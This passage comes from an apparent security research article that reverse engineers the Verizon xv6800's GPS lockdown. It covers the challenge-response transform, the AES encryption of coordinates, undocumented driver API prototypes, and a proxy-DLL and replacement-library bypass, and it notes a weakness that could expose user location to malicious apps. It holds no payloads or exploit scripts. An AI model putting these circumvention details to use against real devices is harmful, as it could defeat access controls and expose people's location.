the HTC Titan, with a carrier-customized firmware loadout) is a recently
|
||||
released Windows Mobile-based smartphone. A firmware update released during
|
||||
August 2008 enabled several new features on the device. For the purposes of
|
||||
this article, the author has elected to focus on the embedded Qualcomm gpsOne
|
||||
chipset, which provides assisted GPS facilities to applications running on the
|
||||
device.
|
||||
|
||||
With the official firmware upgrade (known as MR1), the assisted GPS support on
|
||||
the device, which had previously remained inaccessible when using carrier-
|
||||
supported firmware, was activated, albeit with a catch; only applications that
|
||||
were approved by Verizon Wireless were able to access the built-in GPS hardware
|
||||
present on the device. Although third-party applications could access an
|
||||
externally connected (for example, Bluetooth-enabled) GPS device, the Qualcomm
|
||||
gpsOne chipset embedded in the phone itself remained inaccessible. Coinciding
|
||||
with the public release of the xv6800 MR1 firmware, Verizon Wireless also began
|
||||
making available a subscription-based application (called "VZ Navigator"),
|
||||
which provides voice-based turn-by-turn navigation on the xv6800 via the usage
|
||||
of the device's built-in GPS hardware.
|
||||
|
||||
There have been a variety of third-party firmware images released for the
|
||||
xv6800 that mix-and-match portions of official firmware releases from other
|
||||
carriers supporting their own rebranded versions of xv6800 (HTC Titan). Some
|
||||
of these custom firmware images enable access to the gpsOne hardware, albeit
|
||||
with several caveats. In particular, until recently, assisted GPS mode, wherein
|
||||
the cellular network aids the device in acquiring a GPS fix, was not available
|
||||
on Verizon Wireless's network with custom firmware images; only standalone GPS
|
||||
mode (which requires waiting for a "cold lock" on three GPS satellites, a
|
||||
process that may take many minutes after device boot) was enabled. In
|
||||
addition, installing these custom firmware images requires patching out a
|
||||
signature check in the software loader on the device. This procedure may be
|
||||
considered dangerous if one wishes to retain hardware warranty support (which
|
||||
may be desirable, given the steep unsubsidized cost of the device).
|
||||
|
||||
Furthermore, should one install the official Verizon Wireless MR1 firmware
|
||||
upgrade, the gpsOne hardware on the device would remain locked down even if one
|
||||
switched to a currently available third-party firmware images. This
|
||||
is likely due to a sticky setting written to the firmware during the carrier
|
||||
provisioning process at the completion of the MR1 firmware upgrade. As the
|
||||
presently available third-party ROM images do not wipe the area of the device's
|
||||
firmware which seems to control the GPS hardware's lockdown state, it becomes
|
||||
difficult to unlock the GPS hardware after having upgraded to the MR1 firmware
|
||||
image. A lengthy process is available to undo this change, but it involves
|
||||
the complete reset of most provisioning settings on the device, such that the
|
||||
phone must be partially manually reprovisioned, as opposed to utilizing the
|
||||
over-the-air provisioning support.
|
||||
|
||||
Given the downsides of relying on custom firmware images for enabling the
|
||||
built-in GPS hardware on the xv6800, the official firmware release does pose a
|
||||
reasonable attraction. However, the locking down of the GPS hardware to only
|
||||
Verizon Wireless authorized applications is undesirable should one wish to use
|
||||
third-party location-enabled applications with the built-in GPS hardware, such
|
||||
as Google Maps or Microsoft's Live Search.
|
||||
|
||||
Verizon Wireless indicates that third-party application usage of the GPS
|
||||
hardware on their devices is subject to Verizon Wireless-dictated policies and
|
||||
procedures [1]. In particular, the security of user location information is
|
||||
often cited [2] as a reason for requiring location-enabled applications to be
|
||||
certified by Verizon Wireless. Unfortunately, the mechanism deployed to lock
|
||||
built-in GPS hardware on the xv6800 provides very little in the way of true
|
||||
security against third-party programs (malicious or otherwise) from accessing
|
||||
location information. In fact, given Windows Mobile 6's lack of "hard" process
|
||||
isolation, it is questionable as to whether it is even technically feasible to
|
||||
provide a truly secure protection mechanism on a device that allows
|
||||
user-supplied programs to be loaded and executed.
|
||||
|
||||
While there may be golden intentions in attempting to protect users from
|
||||
malicious programs designed to harvest their location information on-the-fly,
|
||||
the protection system as implemented to control access to the gpsOne chipset
|
||||
on the xv6800 is unfortunately relatively weak. This is at odds with Verizon
|
||||
Wireless's stated goals of attemting to protect the security of a user's location
|
||||
information, and thus may place users at risk.
|
||||
|
||||
2. Overview of Protection Mechanisms
|
||||
|
||||
There are multiple levels of protection mechanisms built-in to both the MR1
|
||||
firmware image for the xv6800, as well as the GPS-enabled subscription VZ
|
||||
Navigator software that Verizon Wireless supports as the sole officially
|
||||
sanctioned location-based application (at the time of this article's writing).
|
||||
The protection mechanisms can be broken up into those that exist on the device
|
||||
firmware itself, and those that exist in the VZ Navigator software.
|
||||
|
||||
2.1. Firmware-based Protection Mechanisms
|
||||
|
||||
The MR1 firmware provides the underlying foundation of the built-in GPS
|
||||
hardware lockdown logic. There are several built-in software components that
|
||||
are "baked into" the firmware image and support the GPS lockdown system. The
|
||||
principle design underpinning the firmware-based protection system, however, is
|
||||
a fairly run of the mill security-through-obscurity based approach. In
|
||||
particular, GPS location information obtained by the built-in gpsOne hardware
|
||||
(specifically, latitude and longitude) is encrypted. Only programs that
|
||||
understand how to decrypt the position information are able to make sense of
|
||||
any data returned by the gpsOne chipset.
|
||||
|
||||
Furthermore, in order to initiate a location fix via the built-in gpsOne
|
||||
hardware, an application must continually answer correctly to a series of
|
||||
challenge-response interactions with the gpsOne chipset driver (and thus the
|
||||
radio firmware on the device). The reason for implementing both a
|
||||
challenge-response mechanism as well as obfuscating the actual GPS location
|
||||
will become apparent after further discussion.
|
||||
|
||||
The firmware-based protected gpsOne interface has several constituent layers,
|
||||
with supporting code present at radio-firmware level, kernel driver level, and
|
||||
user mode application level.
|
||||
|
||||
At the lowest level, the radio firmware for the device chipset would appear to
|
||||
have a hand in obfuscating returned GPS positioning data. This assumption is
|
||||
logically based on a strings dump of radio firmware images indicating the
|
||||
presence of AES-related calls in GPS-related code (AES is used to encrypt the
|
||||
returned location information), and the fact that switching to a custom
|
||||
firmware image after installing the MR1 update does not re-enable the plaintext
|
||||
gpsOne interface).
|
||||
|
||||
Between the radio firmware (which executes outside the context of Windows
|
||||
Mobile) and the OS itself, there exists a kernel mode Windows Mobile driver
|
||||
known as the GPS intermediate driver. This module (gpsid_qct.dll) provides an
|
||||
interface between user mode callers and the GPS hardware on the device. It
|
||||
also provides support for multiplexing a single piece of GPS hardware across
|
||||
multiple user mode applications concurrently (a standard feature of Windows
|
||||
Mobile's GPS support). However, Verizon Wireless has broken this support with
|
||||
the locked down GPS logic that has been placed in the xv6800's implementation
|
||||
of the GPS intermediate driver.
|
||||
|
||||
Beneath the GPS intermediate driver, there are two different interfaces that
|
||||
are supported for the collection of location data on Windows Mobile-based
|
||||
devices [4]. The first of these is an emulated serial port that is exposed to
|
||||
user mode, and implements a standard NMEA-compatible text-based interface for
|
||||
accessing location information. This interface has also been broken by the
|
||||
GPS intermediate driver used by Verizon Wireless on the xv6800, for reasons
|
||||
that will become clear upon further discussion.
|
||||
|
||||
The second interface for retrieving location information via the GPS
|
||||
intermediate driver is a set of IOCTLs implemented by the GPS intermediate
|
||||
driver to retrieve parsed (binary) GPS data from the currently-active GPS
|
||||
hardware (returned as C-style structures). User mode callers do not typically
|
||||
call these IOCTLs directly from their code, but instead indirect through a set
|
||||
of thin C API wrappers in a system-supplied module called gpsapi.dll. This
|
||||
interface is also broken by the GPS lockdown logic in the GPS intermediate
|
||||
driver, although an extended version of this IOCTL-based interface is used by
|
||||
GPS-enabled applications that support the locked down mode of operation on the
|
||||
xv6800.
|
||||
|
||||
Verizon Wireless ships a custom module parallel to gpsapi.dll on the xv6800,
|
||||
named oemgpsOne.dll. This module exports a superset of the APIs provided by
|
||||
the standard gpsapi.dll (although there are slight differences in function
|
||||
names). Additionally, new APIs (which are, as in gpsapi.dll, simply thin
|
||||
wrappers around IOCTL requests sent to the GPS intermediate driver) are
|
||||
provided to manage the challenge-response and encrypted GPS location aspects
|
||||
of the gpsOne lockdown system present on the xv6800. Through correct usage of
|
||||
the APIs exported by oemgpsOne.dll, a program with knowledge of the GPS lock
|
||||
down system can retrieve valid positioning data from the gpsOne chipset on the
|
||||
device.
|
||||
|
||||
Applications that are approved by Verizon Wireless for location-enabled
|
||||
operation make calls to a library developed by Verizon Wireless and Autodesk,
|
||||
named LBSDriver.dll, which is itself a client of oemgpsOne.dll. LBSDriver.dll
|
||||
and its security measures are discussed later, along with VZ Navigator.
|
||||
|
||||
2.1.a. Application Authorization via Challenge-response
|
||||
|
||||
In order to activate the gpsOne hardware on the xv6800 and request a GPS
|
||||
location fix, an application must receive a challenge data block from the
|
||||
gpsOne driver and perform a secret transform on the given data in order to
|
||||
create a well-formed response. Until this process is completed, the gpsOne
|
||||
hardware will not attempt to return a location fix. Furthermore, a
|
||||
location-enabled application using the built-in gpsOne hardware must
|
||||
continually complete additional challenge-response sequences (using the same
|
||||
underlying algorithms) as it continues to acquire updated location fixes from
|
||||
the gpsOne hardware.
|
||||
|
||||
The first step in connecting to the GPS intermediate driver to retrieve valid
|
||||
position information is to open a handle to a GPS intermediate driver instance.
|
||||
This is accomplished with a call to an oemgpsOne.dll export by the name of
|
||||
oGPSOpenDevice. The parameters and return value of this function are analogous
|
||||
to the standard Windows Mobile GPSOpenDevice routine [5].
|
||||
|
||||
HANDLE
|
||||
oGPSOpenDevice(
|
||||
__in HANDLE NewLocationData,
|
||||
__in HANDLE DeviceStateChange,
|
||||
__in const WCHAR *DeviceName,
|
||||
__in DWORD Flags
|
||||
);
|
||||
|
||||
After a handle to the GPS intermediate driver instance is available, the next
|
||||
step in preparing for the challenge-response sequence is to issue a call to
|
||||
a second function implemented by oemgpsOne.dll, named oGPSGetBaseSSD.
|
||||
This routine returns a session-specific blob of data that is later used in the
|
||||
challenge-response process. In the current implementation, the returned blob
|
||||
appears to always contain the same data across every invocation.
|
||||
|
||||
DWORD
|
||||
oGPSGetBaseSSD(
|
||||
__in HANDLE Device,
|
||||
__out unsigned char *Buf, // sizeof = 0x10
|
||||
__out unsigned long *BufLength, // 0x10
|
||||
__out unsigned short *Buf2 // sizeof = 0x10
|
||||
);
|
||||
|
||||
Next, the GPS intermediate driver must be provided with a valid event handle to
|
||||
signal when a new challenge cycle has been requested by the driver. This is
|
||||
accomplished via a call to the oGPSEnableSecurity function in oemgpsOne.dll.
|
||||
|
||||
DWORD
|
||||
oGPSEnableSecurity(
|
||||
__in HANDLE Device,
|
||||
__in HANDLE SecurityChangeEvent
|
||||
);
|
||||
|
||||
After the session-specific blob has been retrieved, and an event handle for
|
||||
new challenge requests has been provided to the GPS intermediate driver, the
|
||||
next step is to receive a challenge block from the GPS intermediate driver and
|
||||
compute a valid response. The application must wait until the GPS intermediate
|
||||
driver signals the challenge request event before requesting the current
|
||||
challenge data block. Once the driver signals the event that was passed to
|
||||
oGPSEnableSecurity, the application must execute one challenge-response cycle.
|
||||
|
||||
Challenge data blocks are retrieved from the gpsOne driver via a call to a
|
||||
routine exported from oemgpsOne.dll, named oGPSReadSecurityConfig. As per the
|
||||
prototype, this routine takes a handle to the GPS intermediate driver instance,
|
||||
and returns a blob of data used to generate a challenge response.
|
||||
|
||||
DWORD
|
||||
oGPSReadSecurityConfig(
|
||||
__in HANDLE Device,
|
||||
__out unsigned char *Buf // On return, 0x4 + 1 + 1 + Buf[0x6] (max length 0x1c total)
|
||||
);
|
||||
|
||||
After the challenge data blob has been retrieved via a call to
|
||||
oGPSReadSecurityConfig, the GPS lockdown-aware application must perform a
|
||||
series of secret transformations on it before indicating a companion response
|
||||
blob down to the GPS intermediate driver. The transformation function consists
|
||||
of some bit-shuffling of the challenge blob, followed by a SHA-1 hash of the
|
||||
shuffled challenge blob concatenated with the session-specific data blob. This
|
||||
process yields the bulk of the response data less a two-byte header that is
|
||||
prepended prior to indication down to the GPS intermediate driver.
|
||||
|
||||
The process of sending the computed challenge-response is accomplished via a
|
||||
call to another function in oemgpsOne.dll, by the name of
|
||||
oGPSWriteSecurityConfig.
|
||||
|
||||
DWORD
|
||||
oGPSWriteSecurityConfig(
|
||||
__in HANDLE Device,
|
||||
__in unsigned char *Buf // 0x1C
|
||||
);
|
||||
|
||||
The GPS intermediate driver will continue to periodically challenge the
|
||||
application while it requests updated position fixes from the gpsOne chipset.
|
||||
This is accomplished by signaling the event passed to oGPSEnableSecurity, which
|
||||
indicates to the application that it should retrieve a new challenge and create
|
||||
a new response, using the mechanism outlined above.
|
||||
|
||||
2.1.b. Location Information Encryption
|
||||
|
||||
Without passing the challenge-response scheme previously described, the GPS
|
||||
intermediate driver will refuse to return a set of position information from
|
||||
the gpsOne hardware. Even after the challenge-response system has been
|
||||
implemented, however, a secondary layer of security must be addressed. This
|
||||
security layer takes the form of the encryption of the latitude and longitude
|
||||
values returned by the gpsOne chipset.
|
||||
|
||||
While this second layer of security may appear superfluous at first glance,
|
||||
there exists a valid reason for it. Recall that the GPS intermediate driver
|
||||
multiplexes a single piece of GPS hardware across multiple applications. In
|
||||
the implementation of the current GPS intermediate driver for the xv6800, the
|
||||
challenge-response scheme appears to map directly to the gpsOne chipset itself.
|
||||
|
||||
Thus, once a single program has passed the challenge-response mechanism, and as
|
||||
long as that program continues to respond correctly to challenge-response
|
||||
requests, any program on the system can call any of the standard Windows Mobile
|
||||
GPS interfaces to retrieve location data. This presents the obvious security
|
||||
hole wherein a Verizon Wireless-approved GPS application is started, and then a
|
||||
third-party application using the standard Windows Mobile GPS API is loaded,
|
||||
in effect "piggy-backing" on top of the challenge-response code residing in the
|
||||
approved application to allow access to the embedded gpsOne hardware.
|
||||
|
||||
For reasons unclear to the author, the designers of the GPS lockdown system
|
||||
did not choose to simply disable GPS requests not associated with the program
|
||||
that has passed the challenge-response scheme. Instead, a different approach
|
||||
is taken, such that the GPS intermediate driver encrypts the location
|
||||
information that it returns via either serial port or gpsapi.dll interfaces.
|
||||
|
||||
In order to make sense of the returned latitude and longitude values, a program
|
||||
must be able to decrypt them. While the GPS intermediate driver provides the
|
||||
decryption key in plaintext equivalent to any program that knows how to request
|
||||
it, this information is not available to clients of the standard Windows Mobile
|
||||
NMEA-compatible virtual serial port or gpsapi.dll interfaces. Aside from
|
||||
latitude and longitude data, however, all other information returned by the
|
||||
standard Windows Mobile GPS interface is unadulterated and valid (this includes
|
||||
altitude and timing information, primarily).
|
||||
|
||||
Thus, the first step to decoding valid position values is to call an extended
|
||||
version of the standard Windows Mobile GPSGetPosition routine [6]. This
|
||||
extended routine is named oGPSGetPosition, and it, too, is implemented in
|
||||
oemgpsOne.dll. The prototype matches that of the standard GPSGetPosition,
|
||||
although an extended version of the GPS_POSITION structure containing
|
||||
additional information (including a blob needed to derive the decryption key
|
||||
required to decrypt the longitude and latitude values) is returned.
|
||||
|
||||
DWORD
|
||||
oGPSGetPosition(
|
||||
__in HANDLE Device,
|
||||
__out PGPS_POSITION GPSPosition,
|
||||
__in DWORD MaximumAge,
|
||||
__in DWORD Flags
|
||||
);
|
||||
|
||||
Decryption of the latitude and longitude information is fairly straight-
|
||||
forward, involving a transform (via the same transformation process described
|
||||
previously) of the challenge data returned as a part of the extended
|
||||
GPS_POSITION structure. This yields an AES key, which is imported into a
|
||||
CryptoAPI key object, and then used in ECB mode to decrypt the latitude and
|
||||
longitude values.
|
||||
|
||||
Once decryption is complete, a scaling factor is then applied to the resultant
|
||||
coordinate values, in order to bring them in line with the unit system used by
|
||||
the standard Windows Mobile GPS interfaces.
|
||||
|
||||
2.2.b. VZ Navigator (Application-level) Protection Mechanisms
|
||||
|
||||
While many parts of the GPS lockdown system are implemented by radio firmware-
|
||||
level, or kernel mode-level code, portions are also implemented in user mode.
|
||||
An approved Verizon Wireless application accesses location information by
|
||||
calling through a module developed by Verizon Wireless and Autodesk, and named
|
||||
LBSDriver.dll. In an approved application, it is the responsibility of
|
||||
LBSDriver.dll to communicate with the GPS intermediate driver via
|
||||
oemgpsOne.dll, and implement the challenge-response and position decryption
|
||||
functionality. LBSDriver.dll then exports a subset of the standard Windows
|
||||
Mobile gpsapi.dll (with several custom additions), for usage by approved
|
||||
programs on the xv6800.
|
||||
|
||||
Additionally, LBSDriver.dll implements a user-controlled privacy policy on top
|
||||
of the gpsOne hardware. The user is allowed to specify at what times of day a
|
||||
particular program can access location information, and whether the user is
|
||||
prompted to confirm the request. The privacy policy configuration process is
|
||||
driven via a dialog box (implemented and created by LBSDriver.dll) that is
|
||||
shown on the device the first time an application runs, and subsequently via
|
||||
a Verizon Wireless-operated web site [7]. Privacy policy settings are
|
||||
obfuscated and stored in the registry, keyed off of a hash of the calling
|
||||
program's main process image fully-qualified filename.
|
||||
|
||||
Because LBSDriver.dll is a standard, loadable DLL, it is vulnerable to being
|
||||
loaded by untrusted code. There are several defenses implemented by the
|
||||
LBSDriver module which attempt to deter third-party programs that have not been
|
||||
approved by Verizon Wireless from successfully loading LBSDriver.dll and
|
||||
subsequently using it to access location information.
|
||||
|
||||
The first such protection embedded into LBSDriver.dll is a digital signature
|
||||
check on the main process executable corresponding to any program that attempts
|
||||
to load LBSDriver.dll. This check is ultimately triggered when the
|
||||
GPSOpenDevice export on LBSDriver.dll is called. Specifically, the calling
|
||||
process module is confirmed to be signed by a custom certificate. If this is
|
||||
not the case, then an error dialog is shown, and the GPSOpenDevice request is
|
||||
denied. This check is based on calling GetModuleFileName(NULL, ...) [8] to
|
||||
retrieve the path to the main process image, which is then run through the
|
||||
aforementioned signature check.
|
||||
|
||||
Additionally, LBSDriver.dll also connects to an Autodesk-operated server in
|
||||
order to determine if the calling program is authorized to use LBSDriver.dll.
|
||||
In addition to verifying that the calling program is approved as a GPS-enabled
|
||||
application, the Autodesk-operated server also appears to indicate back to the
|
||||
client whether or not the user's account has been provisioned for a
|
||||
subscription location-enabled application, such as VZ Navigator. A program
|
||||
hoping to utilize LBSDriver.dll must pass these checks in order to successfully
|
||||
acquire a location fix using the built-in gpsOne hardware.
|
||||
|
||||
The Autodesk-operated server also provides configuration information (such as
|
||||
Position Determining Entity (PDE) addresses) that is later used in the assisted
|
||||
GPS process. However, this configuration information appears to be more or
|
||||
less static, at least for the critical portions necessary to enable assisted
|
||||
GPS, and can thus be cached and reused by third-party programs without even
|
||||
needing to go through the Autodesk server.
|
||||
|
||||
3. Opening gpsOne on the xv6800 to Third-party Applications.
|
||||
|
||||
Understanding the protection mechanisms that implement the locking down of the
|
||||
built-in GPS hardware is only part of the battle to enable third-party
|
||||
GPS-enabled programs to operate on the xv6800. Undocumented functions in
|
||||
oemgpsOne.dll with no equivalent in the standard Windows Mobile gpsapi.dll, and
|
||||
various quirks of Windows Mobile itself preclude a straightforward
|
||||
implementation to unlock the GPS for third-party programs.
|
||||
|
||||
Furthermore, third-party GPS-enabled programs are written to one (or commonly,
|
||||
both) of the standard Windows Mobile GPS interfaces. Because these interfaces
|
||||
are disabled on the xv6800, a solution to adapt third-party programs to the
|
||||
locked down GPS interface would be required (in lieu of modifying every single
|
||||
third-party application to support the locked down GPS interface). As many of
|
||||
these third-party applications are closed-source and frequently updated, any
|
||||
solution that required direct modification of a third-party program would be
|
||||
untenable from a maintenance perspective.
|
||||
|
||||
The solution chosen was to write an emulation layer for the standard Windows
|
||||
Mobile gpsapi.dll interface, which translates standard gpsapi.dll function
|
||||
calls into requests compatible with the locked down GPS interface.
|
||||
|
||||
3.1. Examining gpsOne Driver Interactions
|
||||
|
||||
The first step in implementing a layer to unlock the gpsOne hardware on the
|
||||
xv6800 involves discovering the correct sequence of oemgpsOne.dll calls (and
|
||||
thus calls to the GPS intermediate driver, as oemgpsOne.dll is merely a thin
|
||||
wrapper around IOCTL requests to the GPS intermediate driver, for the most
|
||||
part, with some minor exceptions).
|
||||
|
||||
The standard way that this would be done on a Windows-based system would be to
|
||||
run VZ Navigator under a debugger, but there exist several complications that
|
||||
prevent this from being an acceptable solution for monitoring oemgpsOne.dll
|
||||
requests.
|
||||
|
||||
First, the assisted GPS functionality of the gpsOne hardware requires that the
|
||||
device be connected to the cellular network, and operating with it as the
|
||||
default gateway, as a connection to a carrier-supplied server (known as a
|
||||
"Position Determining Entity", or PDE) must be made. The PDE servers that are
|
||||
operated by Verizon Wireless are firewalled off from outside their network, and
|
||||
in addition, it is possible that they use the IP address assigned to the user
|
||||
making a request for location assistance purposes.
|
||||
|
||||
Unfortunately, the debugger connection to a Windows Mobile-based device, for
|
||||
all the Windows Mobile debuggers that the author had access to (IDA Pro 5.1 and
|
||||
the Visual Studio 2005 debugger) require an ActiveSync link. While the
|
||||
ActiveSync link is enabled, it supersedes the cellular link for data traffic.
|
||||
Even when the computer on the other end of the ActiveSync link was connected to
|
||||
the cellular network via a separate cellular modem, the GPS functionality did
|
||||
not operate, due to an apparent check of whether the cellular link is the most-
|
||||
precedent data link on the device.
|
||||
|
||||
This means that observing much of the oemgpsOne.dll calls relating to position
|
||||
fixes would not be possible with the standard debugging tools available. The
|
||||
solution that was implemented for this problem was to write a proxy DLL that
|
||||
exports every symbol exported by oemgpsOne.dll, logs the parameters of any such
|
||||
API calls, and then forwards them on to the underlying oemgpsOne.dll
|
||||
implementation (logging return values and out parameters after the actual
|
||||
implementation function in question returned).
|
||||
|
||||
While potentially labor-intensive, in terms of creating the proxy DLL, such a
|
||||
technique is relatively simple on Windows. The usual procedure for such a task
|
||||
would be to create the proxy DLL, place it in the directory containing the main
|
||||
process image of the program to be hooked, and then load the real DLL with a
|
||||
fully-qualified path name from inside the proxy DLL.
|
||||
|
||||
Unfortunately, Windows Mobile does not allow two DLLs with the same base name
|
||||
to be loaded, even if a fully-qualified path is specified with a call to
|
||||
LoadLibrary. Instead, the first DLL that happened to get loaded by any process
|
||||
on the entire system matching the requested base name is returned. This means
|
||||
that in order to load a proxy DLL, one of two approaches would need to be
|
||||
taken.
|
||||
|
||||
The first such option is to rename the the proxy DLL itself, along with the
|
||||
filename of the imported DLL in the desired target module, by modifying the
|
||||
actual desired target module itself on-disk. The second option is to rename
|
||||
the DLL containing the implementation of the proxied functionality, and then
|
||||
load that DLL by the altered name in the proxy DLL. Both approaches are
|
||||
functionally equivalent on Windows Mobile; the author chose the former in
|
||||
this case.
|
||||
|
||||
Through disassembly, a rough estimate of the prototypes of the various APIs
|
||||
exported by oemgpsOne.dll was created, and from there, a proxy module
|
||||
(oemgpsOneProxy.dll) was written to log specific API calls to a file for later
|
||||
analysis. This approach allowed for relatively quick identification of any
|
||||
arguments to oemgpsOne.dll calls which were not immediately obvious from static
|
||||
disassembly, despite the lack of a debugger on the target when many of the
|
||||
calls were made.
|
||||
|
||||
3.2. Implementing a Custom oemgpsOne.dll client
|
||||
|
||||
After discerning the prototypes for the various oemgpsOne.dll supporting APIs,
|
||||
the next step in unlocking the built-in GPS hardware on the xv6800 was to write
|
||||
a custom client program that utilized oemgpsOne.dll to retrieve decrypted
|
||||
location values from the gpsOne chipset.
|
||||
|
||||
Although one approach to this task might be to attempt to disable the various
|
||||
security checks present in LBSDriver.dll, it was deemed easier to re-implement
|
||||
an oemgpsOne.dll client from scratch. In addition, this approach also allowed
|
||||
the author to circumvent various implementation bugs and limitations present
|
||||
in LBSDriver.dll.
|
||||
|
||||
Given the information gleaned from analyzing LBSDriver.dll's implementation of
|
||||
the challenge-response and GPS decryption logic, and the API call logging from
|
||||
the oemgpsOne.dll proxy module, writing a client for oemgpsOne.dll is merely an
|
||||
exercise in writing the necessary code to connect all of the pieces together in
|
||||
the correct fashion.
|
||||
|
||||
After valid GPS position data can be retrieved from oemgpsOne.dll, all that
|
||||
remains is to write an adapter layer to connect programs written against the
|
||||
standard Windows Mobile gpsapi.dll to the custom oemgpsOne.dll client.
|
||||
|
||||
However, there are inherent design limitations in the locked down GPS interface
|
||||
that complicate the creation of a practical adapter to convert gpsapi.dll calls
|
||||
into oemgpsOne.dll calls. For example, a naive implementation that might
|
||||
involve creating a module to replace gpsapi.dll with a custom binary to make
|
||||
inline calls to oemgpsOne.dll would run aground of a number of pitfalls.
|
||||
|
||||
Specifically, as oemgpsOne.dll depends on gpsapi.dll, attempting to simply
|
||||
replace gpsapi.dll with a custom module will break the very oemgpsOne.dll
|
||||
functionality used to communicate with the GPS intermediate driver, due to
|
||||
the previously mentioned "one dll for a given base name" Windows Mobile
|
||||
limitation. In addition, it is not possible for two programs to simply
|
||||
simultaneously operate full clients of oemgpsOne.dll, as the challenge-response
|
||||
mechanism operates globally and will not operate correctly should two
|
||||
applications simultaneously attempt to engage it.
|
||||
|
||||
The most straightforward solution to the former issue is to simply rename a
|
||||
copy of the stock gpsapi.dll, and then modify oemgpsOne.dll to refer to the
|
||||
renamed gpsapi.dll. This opens the door to replacing the system-supplied
|
||||
gpsapi.dll with a custom replacement gpsapi.dll implementing a client for
|
||||
oemgpsOne.dll.
|
||||
|
||||
3.3. Multiplexing GPS Across Multiple Applications.
|
||||
|
||||
The GPS intermediate driver supports multiplexing the GPS hardware present on
|
||||
a Windows Mobile-based device across multiple applications. However, as
|
||||
previously noted, the locked down GPS interface breaks this functionality, as
|
||||
no two programs can participate in the full challenge-response protocol for
|
||||
keeping the gpsOne hardware active simultaneously.
|
||||
|
||||
Although the first program to start could be designated the "master", and thus
|
||||
be responsible for challenge-response operations (with secondary programs
|
||||
merely decrypting position data locally), this introduces a great deal of extra
|
||||
complexity. Specifically, significant coordination issues arise relating to
|
||||
cleanly handling the fact that third-party GPS-enabled programs are typically
|
||||
unaware of each other. Thus, work must be done to handle the case where one
|
||||
program having previously activated the gpsOne hardware exits, leaving any
|
||||
remaining programs still using GPS with the problem of selecting a new "master"
|
||||
program to perform challenge-responses with the GPS intermediate driver.
|
||||
|
||||
Given the difficulties of such an approach, a different model was chosen, such
|
||||
that the replacement gpsapi.dll acts as a client of a server program which then
|
||||
mediates access to the locked down GPS interface on behalf of all active GPS-
|
||||
enabled programs. Although there exist synchronization and coordination issues
|
||||
with this model, they are simpler to deal with than the alternative
|
||||
implementation.
|
||||
|
||||
3.4. Caveats.
|
||||
|
||||
While the resultant GPS adapter system supports third-party programs that
|
||||
utilize gpsapi.dll, any programs using the virtual NMEA serial port interface
|
||||
will not operate successfully. Unfortunately, the same approach towards the
|
||||
replacement of gpsapi.dll is not feasible with the APIs utilized in
|
||||
communication with a serial port, by virtue of the sheer number of function
|
||||
calls present in coredll.dll that would need to be forwarded on to the real
|
||||
coredll.dll via a proxy module.
|
||||
|
||||
4. Bugs in the Verizon Wireless xv6800 gpsOne Lock Down Logic
|
||||
|
||||
Few programs designed to lockdown portions of a system via security through
|
||||
obscurity are bug-free, and the GPS lockdown logic on the xv6800 is certainly
|
||||
no exception. The lockdown code has a number of localized and systemic issues
|
||||
pervading the current implementation.
|
||||
|
||||
4.1. Thread Safety Issues
|
||||
|
||||
There are a number of threading related issues present throughout the locked
|
||||
down GPS interface.
|
||||
|
||||
- The GPS intermediate driver does not properly synchronize the case of
|
||||
multiple simultaneous callers using the extended IOCTLs not present on a
|
||||
stock GPS intermediate driver implementation.
|
||||
- LBSDriver.dll utilizes a dedicated thread for performing challenge-response
|
||||
processing with the GPS intermediate driver. However, there is no
|
||||
synchronization provided between the challenge-response thread and the thread
|
||||
that retrieves and decrypts GPS position data, leading to a race condition in
|
||||
which it might be possible for decryption to return garbage data.
|
||||
|
||||
4.2. API Mis-use
|
||||
|
||||
In several cases, LBSDriver.dll fails to use standard Windows APIs correctly.
|
||||
|
||||
- LBSDriver.dll performs dangerous operations in DllMain, such as loading
|
||||
other DLLs, despite such operations being long-documented as blatantly
|
||||
illegal and prone to difficult to diagnose deadlocks (particularly on a
|
||||
device with extremely limited debugging support).
|
||||
- When LBSDriver.dll performs the AES decryption on the latitude/longitude
|
||||
values returned by oemgpsOne.dll, it creates a CryptoAPI key blob, in order
|
||||
to import the derived AES key into a CryptoAPI key object (via the use of the
|
||||
CryptImportKey routine). However, the length of the key blob passed to
|
||||
CryptImportKey is actually too short. This would appear to make
|
||||
LBSDriver.dll seemingly dependent on a bug in the Windows Mobile 6
|
||||
implementation of CryptoAPI. Specifically, the key blob format for a
|
||||
symmetric key includes a count in bytes of key material, and the data passed
|
||||
to CryptImportKey is such that the key blob structure claims to extend beyond
|
||||
the length of bytes that LBSDriver.dll specifies for the key blob structure
|
||||
itself. It might even be the case that this represents a security problem in
|
||||
CryptoAPI due to apparently non-functional length checking in this case, as
|
||||
key blobs are documented to be transportable across an untrusted medium.
|
||||
|
||||
To illustrate second issue, consider the following code fragment:
|
||||
|
||||
//
|
||||
// Initialize the header.
|
||||
//
|
||||
|
||||
BlobHeader = (BLOBHEADER *)KeyBlob;
|
||||
|
||||
BlobHeader->bType = PLAINTEXTKEYBLOB;
|
||||
BlobHeader->bVersion = 2;
|
||||
BlobHeader->reserved = 0;
|
||||
BlobHeader->aiKeyAlg = CALG_AES_128;
|
||||
|
||||
//
|
||||
// Initialize the key length in the BLOB payload.
|
||||
//
|
||||
|
||||
*(DWORD *)(&KeyBlob[ 0x08 ] ) = KeyLength;
|
||||
|
||||
//
|
||||
// Initialize the key material in the BLOB payload.
|
||||
//
|
||||
|
||||
memcpy( KeyBlob + 0x0C, KeyData, KeyLength );
|
||||
|
||||
//
|
||||
// Generate a CryptoAPI AES-128 key object from our key material.
|
||||
//
|
||||
|
||||
if (!CryptImportKey(
|
||||
CryptProv,
|
||||
KeyBlob,
|
||||
KeyLength, // BUGBUG: Should really be KeyLength + 0x0C...
|
||||
NULL,
|
||||
0,
|
||||
&Key))
|
||||
{
|
||||
break;
|
||||
}
|
||||
|
||||
Contrary to the Microsoft-supplied documentation [9] for CryptImportKey, the
|
||||
third parameter passed to CryptImportKey ("dwDataLen", as "KeyLength" in this
|
||||
example) is too short for the key blob specified, as the length field in the
|
||||
blob header itself describes the key material as being "KeyLength" bytes.
|
||||
Thus, the LBSDriver.dll module would appear to depend upon either CryptoAPI or
|
||||
the default Microsoft cryptographic provider on Windows Mobile not validating
|
||||
blob header key material lengths properly, as the supplied blob header claims
|
||||
that the key material extends outside the provided blob buffer (given the
|
||||
length passed to CryptImportKey).
|
||||
|
||||
Microsoft-supplied sample code [10] illustrates the correct construction of a
|
||||
symmetric key blob, and does not suffer from this deficiency.
|
||||
|
||||
5. Suggested Countermeasures
|
||||
|
||||
Although several attempts were made throughout the GPS lockdown system on the
|
||||
xv6800 to deter third party programs from successfully communicating with the
|
||||
